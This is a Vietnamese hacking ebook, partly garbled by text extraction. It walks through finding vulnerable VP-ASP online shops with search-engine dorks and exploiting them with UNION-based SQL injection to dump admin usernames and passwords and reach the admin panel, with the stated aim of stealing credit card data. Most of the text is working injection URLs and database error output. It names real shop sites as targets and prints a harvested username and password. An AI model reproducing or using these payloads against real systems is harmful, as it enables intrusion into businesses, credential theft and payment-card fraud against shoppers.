Đang tải... (xem toàn văn)
Ebook Hacking Credit Card
Ebook viết nhằm mục đích học hỏi chia kiến thức Email: hieuitpc@yahoo.com Homepage: http://cntt.pro.vn Nội dung ebook: hai tutorials hieupc viết vài tutorials khác anh em hữu viết, có vài tutorials cũ đáng đưa vào với mục đích để tham khảo Hacking Credit Card Version 2.0 - Written by Hieupc shopdisplayproducts.asp?cat=' Sau thời gian dài TTD bị chia cắt đến nay, hieupc bắt đầu viết tutorial hack credit card có lẽ tutorial cuối đầy đủ nhất,được hieupc biên soạn sưu tầm từ nhiều tutorial cũ đến vào ebook trả lời câu hỏi thắc mắc bạn hieupc ðã làm Ebook hacking credit card Nào bắt ðầu bắt ðầu Cách nhý cách thông thường khai thác theo l ỗi SQL áp dụng cho số lỗi khác như: OLE DB, JET Database, ASP… Býớc 1: Khuyến cáo nên search shop www.google.com www.search.com thấy site very good Từ khoá nên dùng: allinurl:”shopdisplayproducts.asp?id= allinurl:”shopdisplayproducts.asp?cat=1 allinurl:”shopdisplayproducts.asp?cat=2…… Search shop theo Domain com, net , biz… : allinurl:”.com/shopdisplayproducts.asp?cat=,allinurl:”.net/shopdisplayproducts.asp?cat= Ai biết chấm thay vào :) Khả lấy credit card: 99.9 % 0.1 % lại phụ thuộc vào đầu bạn Xong phần search, bạn thu hoặch lại tất shop bị lỗi bắt ðầu hack Býớc 2: Ví dụ: lấy ví dụ site có dạng : http://www.victim.com http://www.victim.com/shopdisplayproducts.asp?id=5 Ta thêm dấu phẩy ( ` ) vào sau số 5: http://www.victim.com/shopdisplayproducts.asp?id=5' Xem có bị lỗi khơng nào, hic khơng bị lỗi, thấy này: Home Improvement Page of Không sao, bình tĩnh nhé, thay “ id “ “ cat “ thử xem: http://www.victim.com/shopdisplayproducts.asp?id=5' >>> http://www.victim.com/shopdisplayproducts.asp?cat=5' Uh, lỗi ruì kìa: 5' Microsoft JET Database Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c catdescription like '5'%' and hide=0 order by specialoffer desc,cname' /shop$db.asp, line 467 Okie, tiếp tục nhé, bạn thêm ðoạn code sau ðây vào: '%20union%20%20select%201%20from%20tbluser"having%201=1 sp_password http://www.victim.com/shopdisplayproducts.asp?id=5' Khi thêm xong nhý này: http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201%20from%20tbluser"having% 201=1 sp_password ðýợc thế? : 5' union select from tbluser"having 1=1 sp_password Microsoft JET Database Engine error '80040e14' The number of columns in the two selected tables or queries of a union query not match /shop$db.asp, line 467 Chú ý bạn, dấu phẩy ( ` ) quan trọng, khơng có khơng Và ta tiếp tục thêm số nhé: http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2%20from%20tbluser"having% 201=1 sp_password http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2,3%20from%20tbluser"having %201=1 sp_password http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201,2,3,4%20from% 20tbluser"having%201=1 sp_password Cứ mà tiếp tục cho ðến bạn thấy bảng đẹp đẹp với vài số Ở ðây tới số 47 : http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having %201=1 sp_password click to see more 22 18 Please review these other products: Nào bắt đầu lấy user and pass: · fldusername : thay cho số , hay 4, hay 22 tuỳ bạn · fldpassword : thay cho số , hay 4, hay 22 tuỳ bạn Sau thêm xong ta nhý này: http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having %201=1 sp_password Và có username password : User: stephenrossi pass: gnilsur Hoặc bạn gộp chung fldusername fldpassword vào số http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,fldusername%2b'/'% 2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39, 40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1 sp_password Ta có user pass gộp chung số: stephenrossi/gnilsur Bước 3: Tìm link admin, thử đánh vào không nào: http://www.victim.com/shopadmin.asp hic không Thử thử xem, may chạy đến link admin sao: http://www.victim.com/shopadmin1.asp , không Cái hieupc download source VPASP xem cấu trúc nào, tìm cậu lệnh này, chẳng qua thay table Ta biết table configuration nơi chứa thông quan trọng shop link admin, afftemplateaffiliate, afftemplateMerchant… Vậy cậu lệnh này: '%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47%20from%20configuration"having%201=1 sp_password Thay vào ta được: http://www.valuevision.com.ph/shopdisplayproducts.asp?cat='%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47%20from%20configuration"having%201=1 sp_password Ta thấy bảng: click to see more 22 18 Please review these other products: Lần ta kiếm link admin, thường link admin nằm fieldvalue , ta đặt fieldvalue vào s ố 3, hay 4, hay 22 tuỳ bạn '%20union%20%20select%201,2,3, fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47%20from%20configuration"having%201=1 sp_password Sau thêm xong ta này: http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3, fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47%20from%20configuration"having%201=1 sp_password Các bạn chẳng thấy link admin đâu hết toàn số, lúc đầu hieupc tưởng làm sai cậu lệnh, loay hoay đỗi , kéo trang lên, kéo trang xuống, có tới 10 trang Page of 10 Chỉ cần để ý bạn thấy thơi, nói thêm là: trang chứa thông tin có fieldvalue , bạn cố gắng view trang nhé, hieupc view hết 10 trang thu thập link có *.asp: shopaddmoretocart.asp shopcheckout.asp shopdisplaycategories.asp Nhất định link link admin login , hieupc thử hết link link link admin shopaddmoretocart.asp http://www.victim.com/shopaddmoretocart.asp This site is reserved for Shop Administrators only Administrator's Login UserName : Password : Bây lấy username password để thay vào Việc lại bạn biết Image Field THE END Hacking Credit Card Version 1.0 - Written by Hieupc Hack Shop VPASP thật nào? ( Cập nhật phát triển thêm từ nhiều viết hướng dẫn trước ) CÁCH THỨ 1: Cái có lẽ có nhiều bạn biết, đốn khơng lầm thě có 30 %-50 % member biết cách này, nhiên đưa lên cho bạn chýa biết bạn đă biết rùi học hỏi thêm góp ý thêm cho chỗ chưa hoàn chỉnh ! Cách cách thông th ường khai thác theo l ỗi SQL áp dụng cho s ố lỗi khác OLE DB, JET Database, ASP… Bước 1: Ðể tìm site bị lỗi kiểu địi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi search shop nh cho thật hiệu Bước bước quan trọng khơng có shop lỗi hack :)) Khuyến cáo nên search shop www.google.com www.search.com thấy site very good Từ khoá nên dùng: allinurl:”shopdisplayproducts.asp?id= allinurl:”shopdisplayproducts.asp?id=1 allinurl:”shopdisplayproducts.asp?id=2…… Search shop theo Domain com, net , biz… : allinurl:”.com/shopdisplayproducts.asp?id= ; allinurl:”.net/shopdisplayproducts.asp?id= Ai biết chấm thay vào :) Xong phần search, bạn thu hoặch lại tất shop bị lỗi bắt ðầu hack Bây lấy ví dụ shop nhé: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1 Oh, em Uk cực ngon có CC Bây kiểm tra xem lỗi không cách thêm vào dấu phẩy ( ` ) http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1' Oh site bị lỗi bạn : Products Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order By specialOffer DESC, cname' /chris/shop$db.asp, line 868 Bý?c 2: Ta bắt đầu thêm vào đoạn code : %20union%20%20select%201%20from%20tbluser%27 Vào phía sau link shop nhớ bỏ dấu phẩy sau ?id=1 nhé, không không Khi thêm xong link này: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201%20from% 20tbluser%27 Oh khơng dụ :) Products Microsoft OLE DB Provider for ODBC Drivers error '80004005' [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query not match /chris/shop$db.asp, line 868 Cịn khơng biết qua bước nữa, khoan bạn xem kinh nghiệm đă thêm vào dấu phẩy ( ` ) mà lỗi vầy: Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ' ' /product.asp, line 29 Thì bạn hack theo kiểu hack cũ Thui qua bước nhé, nói nhiều :)) Sau đă hoàn thành bước 2, bạn bắt đầu công việc thiêng liêng mệt mỏi nhất, không mệt đâu uể oải tí, thêm số vào code: 1%20union%20%20select%201,2%20from%20tbluser%27 1%20union%20%20select%201,2,3%20from%20tbluser%27 1%20union%20%20select%201,2,3,4%20from%20tbluser%27……… Khi thêm vào link : http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2%20from% 20tbluser%27 http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3%20from% 20tbluser%27 http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2,3,4%20from% 20tbluser%27 ………… Cứ thêm số tiếp tục nhé, đừng nản lòng cố lên Cho đến xuất bảng đẹp :)) Ái da, mỏi tay tới số 34 bảng trời đánh :)) http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%20from%20tbluser %27 Đây bước cuối để lấy user and pass: số quan trọng shop naỳ : 3, , 22 fldusername